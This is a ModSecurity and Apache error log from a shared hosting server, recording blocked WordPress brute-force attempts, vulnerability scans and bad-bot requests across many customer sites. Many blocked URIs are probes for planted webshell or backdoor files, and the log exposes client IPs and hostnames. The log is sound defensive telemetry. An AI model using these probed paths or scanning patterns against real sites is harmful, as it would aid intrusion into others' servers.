[Tue May 26 13:47:54.800648 2026] [security2:error] [pid 555743:tid 555836] [remote 109.228.50.118:45190] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.50.228.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVXMsjqAquC0YaxQjCl3gABfVw"]
[Tue May 26 13:47:54.802711 2026] [security2:error] [pid 555743:tid 555908] [client 45.148.10.159:37386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/secured/phpinfo.php"] [unique_id "ahVXMsjqAquC0YaxQjCl5QAAAS0"]
[Tue May 26 13:47:55.070383 2026] [security2:error] [pid 544395:tid 544548] [client 20.206.67.134:6725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVXMxmrs7g3RMCdp8XuqAAAABc"]
[Tue May 26 13:47:55.510362 2026] [security2:error] [pid 544395:tid 544581] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXMxmrs7g3RMCdp8XuqwAAADg"]
[Tue May 26 13:47:55.898995 2026] [security2:error] [pid 555743:tid 555894] [client 208.91.198.85:26174] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVXM8jqAquC0YaxQjCl8wABH2A"], referer: https://www.bloggertarget.com
[Tue May 26 13:47:56.005177 2026] [security2:error] [pid 544395:tid 544608] [client 129.222.147.134:7466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXMxmrs7g3RMCdp8XuuwAAAFM"]
[Tue May 26 13:47:56.005334 2026] [security2:error] [pid 544395:tid 544608] [client 129.222.147.134:7466] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXMxmrs7g3RMCdp8XuuwAAAFM"]
[Tue May 26 13:47:56.089989 2026] [security2:error] [pid 544395:tid 544633] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVXMxmrs7g3RMCdp8XuwQAAAGw"], referer: https://www.bloggertarget.com
[Tue May 26 13:47:57.197568 2026] [security2:error] [pid 555743:tid 555899] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXNMjqAquC0YaxQjCmAQAAASQ"]
[Tue May 26 13:47:57.386016 2026] [security2:error] [pid 555743:tid 555942] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXNcjqAquC0YaxQjCmCQAAAU8"]
[Tue May 26 13:47:58.083935 2026] [security2:error] [pid 555743:tid 555991] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXNcjqAquC0YaxQjCmGgAAAYA"]
[Tue May 26 13:47:58.213758 2026] [autoindex:error] [pid 555743:tid 555915] [client 159.65.22.26:53966] AH01276: Cannot serve directory /home2/debatqhn/homegategardensandsuites.com.ng/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:47:58.532222 2026] [security2:error] [pid 555743:tid 555988] [client 20.206.67.134:1094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVXNsjqAquC0YaxQjCmKgAAAX0"]
[Tue May 26 13:47:59.064346 2026] [security2:error] [pid 555743:tid 555874] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXNsjqAquC0YaxQjCmLAAAAQs"]
[Tue May 26 13:47:59.084149 2026] [autoindex:error] [pid 555743:tid 555933] [client 159.65.22.26:57210] AH01276: Cannot serve directory /home2/debatqhn/homegategardensandsuites.com.ng/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:48:00.009989 2026] [security2:error] [pid 555743:tid 555929] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXN8jqAquC0YaxQjCmQQAAAUI"]
[Tue May 26 13:48:00.027606 2026] [security2:error] [pid 544395:tid 544599] [client 4.201.75.230:6081] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/adminfuns.php"] [unique_id "ahVXOBmrs7g3RMCdp8Xu9QAAAEo"]
[Tue May 26 13:48:00.139875 2026] [security2:error] [pid 555743:tid 555886] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXN8jqAquC0YaxQjCmPAAAARc"]
[Tue May 26 13:48:01.183210 2026] [security2:error] [pid 544395:tid 544519] [remote 103.11.102.106:36556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVXOBmrs7g3RMCdp8XvCwAAb3s"]
[Tue May 26 13:48:01.475185 2026] [security2:error] [pid 555743:tid 555916] [client 136.37.154.171:50537] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVXOcjqAquC0YaxQjCmVwAAATU"]
[Tue May 26 13:48:01.644204 2026] [security2:error] [pid 544395:tid 544643] [client 4.201.75.230:6092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/wp-good.php"] [unique_id "ahVXORmrs7g3RMCdp8XvEQAAAHY"]
[Tue May 26 13:48:01.907128 2026] [security2:error] [pid 555743:tid 555916] [client 136.37.154.171:50537] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVXOcjqAquC0YaxQjCmVwAAATU"]
[Tue May 26 13:48:01.907178 2026] [security2:error] [pid 555743:tid 555916] [client 136.37.154.171:50537] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVXOcjqAquC0YaxQjCmVwAAATU"]
[Tue May 26 13:48:02.037318 2026] [security2:error] [pid 555743:tid 555974] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXOcjqAquC0YaxQjCmXQAAAW8"]
[Tue May 26 13:48:03.380597 2026] [security2:error] [pid 544395:tid 544638] [client 106.192.248.115:61158] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXOxmrs7g3RMCdp8XvPQAAAHE"]
[Tue May 26 13:48:03.380701 2026] [security2:error] [pid 544395:tid 544638] [client 106.192.248.115:61158] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXOxmrs7g3RMCdp8XvPQAAAHE"]
[Tue May 26 13:48:04.137590 2026] [security2:error] [pid 544395:tid 544587] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXOxmrs7g3RMCdp8XvQAAAAD4"]
[Tue May 26 13:48:04.832978 2026] [security2:error] [pid 555743:tid 555917] [client 4.201.75.230:6126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/xmlrpc.php"] [unique_id "ahVXPMjqAquC0YaxQjCmhQAAATY"]
[Tue May 26 13:48:05.687881 2026] [security2:error] [pid 555743:tid 555975] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXPcjqAquC0YaxQjCmmAAAAXA"]
[Tue May 26 13:48:05.956171 2026] [security2:error] [pid 544395:tid 544529] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVXPRmrs7g3RMCdp8XvagAAAAQ"], referer: https://www.bloggertarget.com
[Tue May 26 13:48:06.111113 2026] [security2:error] [pid 555743:tid 555887] [client 4.201.75.230:6131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/goods.php"] [unique_id "ahVXPsjqAquC0YaxQjCmpQAAARg"]
[Tue May 26 13:48:06.189909 2026] [security2:error] [pid 555743:tid 555978] [client 129.222.147.134:18586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXPsjqAquC0YaxQjCmpgAAAXM"]
[Tue May 26 13:48:06.205985 2026] [security2:error] [pid 555743:tid 555978] [client 129.222.147.134:18586] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXPsjqAquC0YaxQjCmpgAAAXM"]
[Tue May 26 13:48:07.824593 2026] [security2:error] [pid 544395:tid 544569] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXPxmrs7g3RMCdp8XvfAAAACw"]
[Tue May 26 13:48:08.572026 2026] [security2:error] [pid 544395:tid 544638] [client 40.77.167.24:22385] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.koneksi.com.co"] [uri "/index.php"] [unique_id "ahVXPxmrs7g3RMCdp8XvggAAcQs"]
[Tue May 26 13:48:09.166519 2026] [security2:error] [pid 544395:tid 544546] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXQBmrs7g3RMCdp8XvkQAAABU"]
[Tue May 26 13:48:10.392353 2026] [security2:error] [pid 555743:tid 555951] [client 4.201.75.230:6123] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/class-t.api.php"] [unique_id "ahVXQsjqAquC0YaxQjCm0wAAAVg"]
[Tue May 26 13:48:11.182194 2026] [security2:error] [pid 555743:tid 555925] [client 64.23.177.5:48474] ModSecurity: Warning. Matched phrase "Disco" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "d3dsystems.co.uk.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVXQ8jqAquC0YaxQjCm6wAAAT4"]
[Tue May 26 13:48:11.372983 2026] [security2:error] [pid 555743:tid 555897] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXQsjqAquC0YaxQjCm4AAAASI"]
[Tue May 26 13:48:11.534683 2026] [security2:error] [pid 555743:tid 555978] [client 4.201.75.230:5459] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/sf.php"] [unique_id "ahVXQ8jqAquC0YaxQjCm8wAAAXM"]
[Tue May 26 13:48:12.320569 2026] [security2:error] [pid 544395:tid 544584] [client 81.43.23.241:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXQxmrs7g3RMCdp8XvuQAAADs"]
[Tue May 26 13:48:12.593664 2026] [security2:error] [pid 544395:tid 544625] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXRBmrs7g3RMCdp8XvvQAAAGQ"]
[Tue May 26 13:48:12.662102 2026] [security2:error] [pid 555743:tid 555908] [client 4.201.75.230:6103] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/kbfr.php"] [unique_id "ahVXRMjqAquC0YaxQjCnDgAAAS0"]
[Tue May 26 13:48:14.023108 2026] [security2:error] [pid 555743:tid 555889] [client 106.192.248.115:61473] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXRcjqAquC0YaxQjCnLAAAARo"]
[Tue May 26 13:48:14.023268 2026] [security2:error] [pid 555743:tid 555889] [client 106.192.248.115:61473] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXRcjqAquC0YaxQjCnLAAAARo"]
[Tue May 26 13:48:14.328115 2026] [security2:error] [pid 555743:tid 555997] [client 103.73.54.246:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVXRcjqAquC0YaxQjCnKwAAAYY"]
[Tue May 26 13:48:14.744071 2026] [security2:error] [pid 555743:tid 555967] [client 15.235.169.50:54105] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/include.php"] [unique_id "ahVXRsjqAquC0YaxQjCnSwAAAWg"]
[Tue May 26 13:48:14.875514 2026] [security2:error] [pid 555743:tid 555906] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXRsjqAquC0YaxQjCnQQAAASs"]
[Tue May 26 13:48:14.970586 2026] [security2:error] [pid 555743:tid 555959] [client 45.148.10.159:60430] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXRsjqAquC0YaxQjCnTwAAAWA"]
[Tue May 26 13:48:15.221776 2026] [security2:error] [pid 555743:tid 555989] [client 15.235.169.50:54171] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-2019.php"] [unique_id "ahVXR8jqAquC0YaxQjCnXQAAAX4"]
[Tue May 26 13:48:15.375813 2026] [security2:error] [pid 544395:tid 544611] [client 114.119.148.27:43007] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.moneyapp.com.co"] [uri "/promociones/flexiya"] [unique_id "ahVXRxmrs7g3RMCdp8Xv5wAAAFY"], referer: https://www.findglocal.com/CO/Santiago-de-Cali/104604765368862/Moneyapp-Colombia
[Tue May 26 13:48:15.493950 2026] [security2:error] [pid 555743:tid 555780] [remote 46.224.234.158:38714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 158.234.224.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVXR8jqAquC0YaxQjCnXgABHiQ"]
[Tue May 26 13:48:15.685651 2026] [security2:error] [pid 544395:tid 544530] [client 15.235.169.50:54251] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/admin.php"] [unique_id "ahVXRxmrs7g3RMCdp8Xv7wAAAAU"]
[Tue May 26 13:48:16.166844 2026] [security2:error] [pid 544395:tid 544569] [client 15.235.169.50:54332] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/about.php"] [unique_id "ahVXSBmrs7g3RMCdp8Xv9QAAACw"]
[Tue May 26 13:48:16.400904 2026] [security2:error] [pid 555743:tid 555965] [client 129.222.147.134:15181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXSMjqAquC0YaxQjCnhgAAAWY"]
[Tue May 26 13:48:16.412721 2026] [security2:error] [pid 555743:tid 555965] [client 129.222.147.134:15181] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXSMjqAquC0YaxQjCnhgAAAWY"]
[Tue May 26 13:48:16.665022 2026] [security2:error] [pid 544395:tid 544599] [client 15.235.169.50:54413] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/users.php"] [unique_id "ahVXSBmrs7g3RMCdp8Xv_wAAAEo"]
[Tue May 26 13:48:16.764021 2026] [security2:error] [pid 555743:tid 555999] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXSMjqAquC0YaxQjCnhQAAAYg"]
[Tue May 26 13:48:17.164324 2026] [security2:error] [pid 555743:tid 555977] [client 15.235.169.50:54493] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/pomo/about.php"] [unique_id "ahVXScjqAquC0YaxQjCnnAAAAXI"]
[Tue May 26 13:48:17.642876 2026] [security2:error] [pid 555743:tid 555918] [client 15.235.169.50:54552] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/install.php"] [unique_id "ahVXScjqAquC0YaxQjCnqQAAATc"]
[Tue May 26 13:48:17.914284 2026] [security2:error] [pid 555743:tid 555942] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXScjqAquC0YaxQjCnsQAAAU8"]
[Tue May 26 13:48:18.135420 2026] [security2:error] [pid 555743:tid 555939] [client 15.235.169.50:54615] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/certificates/wp.php"] [unique_id "ahVXSsjqAquC0YaxQjCnugAAAUw"]
[Tue May 26 13:48:18.532517 2026] [security2:error] [pid 544395:tid 544646] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXShmrs7g3RMCdp8XwFwAAAHk"]
[Tue May 26 13:48:18.632195 2026] [security2:error] [pid 555743:tid 555914] [client 15.235.169.50:54689] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/wp-catcher/admin.php"] [unique_id "ahVXSsjqAquC0YaxQjCnyQAAATM"]
[Tue May 26 13:48:18.639452 2026] [security2:error] [pid 544395:tid 544550] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXShmrs7g3RMCdp8XwIAAAABk"]
